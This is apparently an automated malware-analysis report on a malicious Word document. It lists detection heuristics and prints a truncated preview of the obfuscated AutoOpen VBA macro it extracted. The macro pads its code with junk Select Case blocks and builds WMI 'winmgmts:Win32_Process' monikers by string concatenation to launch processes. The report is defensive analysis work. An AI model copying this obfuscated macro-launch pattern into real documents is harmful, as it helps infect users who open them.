Verdict: MALICIOUS
Risk Score: 282
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The macro uses GetObject and CreateObject to reach the WMI Win32_Process class through a winmgmts: moniker, indicating an attempt to execute arbitrary code. The presence of an AutoOpen macro further suggests execution immediately upon opening the document.
Heuristics (8)
- ClamAV: Doc.Malware.Dpzn-6865674-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Dpzn-6865674-0
- VBA macros detected (medium, 4 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- VBA WMI Win32_Process launcher (critical, OLE_VBA_WMI_PROCESS_CREATE): VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 62722 bytes | 7a112d8fbf6e1620cf09d6c3bfd801b5442c4575490850d0827a95c6f13f0cb5 |
Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "u195__"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "E18__15_"
Function j_5_87()
Select Case G1_0_618
Case 447723784
P93889 = Log(Q6_033_)
m0679810 = CDate(785300303)
P4111_ = Fix(126663437 + 514760233 + i_18_645 - Oct(733539026))
O3__9_02 = Cos(100106577 - Sqr(831898273 - Atn(730863810)) - 507807748 + 661269048)
End Select
Select Case P_28349
Case 71880305
P9_0_270 = Log(k__973)
S_935__ = CDate(921852484)
Z3_64755 = Fix(315264843 + 253672570 + p_1__848 - Oct(91764033))
H04324 = Cos(34255452 - Sqr(702842601 - Atn(836122617)) - 234301587 + 608430254)
End Select
Select Case Q4141_21
Case 665495054
P4___51 = Log(C5___15)
O__3475 = CDate(255570150)
W_26748 = Fix(870327825 + 953139016 + u3_2_1 - Oct(287532604))
C765678 = Cos(138167486 - Sqr(10556391 - Atn(304481280)) - 516467797 + 550133244)
End Select
Select Case z1295__
Case 763645484
z06_2_4 = Log(V0_46644)
z2__8_3 = CDate(853531545)
G883504_ = Fix(354637327 + 742854188 + f_4____ - Oct(208669166))
w6381__ = Cos(786123347 - Sqr(976236824 - Atn(962728912)) - 690500935 + 5973924)
End Select
Select Case G_35___
Case 282176963
X4781997 = Log(z91215)
N552__ = CDate(844541035)
j_37660 = Fix(23614483 + 234963654 + K2_653 - Oct(394675726))
F58__128 = Cos(348314512 - Sqr(269808230 - Atn(576973293)) - 722958843 + 65488023)
End Select
Select Case L_71_4_
Case 800972472
z6_944_2 = Log(V_15164_)
z_1_955 = CDate(234530668)
S214_44 = Fix(989167551 + 626384237 + f4816_ - Oct(183959124))
z_87_25 = Cos(974520651 - Sqr(981173403 - Atn(926300898)) - 983335012 + 747925584)
End Select
End Function
Function L_22_1_(t28___75, w88462_)
On Error Resume Next
Select Case Z50985
Case 885926513
h______1 = Log(p04334)
E3656949 = CDate(292195844)
j19_5117 = Fix(188876190 + 68255916 + k74_04 - Oct(134928626))
o5_6458 = Cos(182751109 - Sqr(662572336 - Atn(221893379)) - 570424486 + 841439915)
End Select
Select Case P566_79
Case 524663976
F929_2 = Log(J4_045)
L3_7__3 = CDate(21356895)
N788_137 = Fix(372601622 + 824078040 + S55_4_09 - Oct(90908165))
O370815 = Cos(434503141 - Sqr(92290108 - Atn(652744678)) - 118056175 + 841822409)
End Select
T184__ = Z_7__32 + "winmgmts:Win32" + "_ProcessStartup" + b328365_
Select Case D_17844
Case 436148741
j____3 = Log(P5_467)
F34_82 = CDate(117321797)
Q3_049_ = Fix(604543859 + 658234611 + h47897 - Oct(298424411))
q89_621 = Cos(197054287 - Sqr(464570420 - Atn(610194815)) - 494605964 + 793191674)
End Select
Select Case U5_3270
Case 652297305
u0313828 = Log(J_6_35_8)
p861_96_ = CDate(594990500)
j2_504 = Fix(212096983 + 356631240 + N_058__ - Oct(989957970))
H042543 = Cos(305850197 - Sqr(598050592 - Atn(177921432)) - 104496503 + 941154457)
End Select
Select Case i92__6_1
Case 213498542
v7318_21 = Log(N5_9__)
I445__ = CDate(778477187)
K9__61_9 = Fix(623630271 + 760391658 + J905_54 - Oct(199282081))
d__16898 = Cos(252498051 - Sqr(280539446 - Atn(139200071)) - 113982716 + 938097254)
End Select
f9726__ = t42131 + "winmgmts:Win32" + "_Process" + w981398
Select Case I82388_
Case 962496415
K5__9871 = Log(S_6349_3)
q_8074 = CDate(870961037)
r73500 = Fix(699142838
... (truncated)
```